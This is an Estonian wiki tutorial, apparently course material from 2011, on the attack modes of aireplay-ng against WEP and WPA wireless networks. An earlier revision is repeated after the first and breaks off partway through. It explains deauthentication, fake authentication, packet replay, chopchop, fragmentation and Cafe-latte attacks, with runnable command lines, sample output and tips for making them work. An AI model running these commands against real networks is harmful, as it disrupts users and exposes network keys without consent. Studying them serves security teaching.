[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T19:06:06Z

Tliiv: /* Rünnak 3: ARP request replay attack */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

<pre>
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Saving ARP requests in replay_arp-0001-123456.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
</pre>

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:59:58Z

Tliiv: /* Manipuleeritavad pakid */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
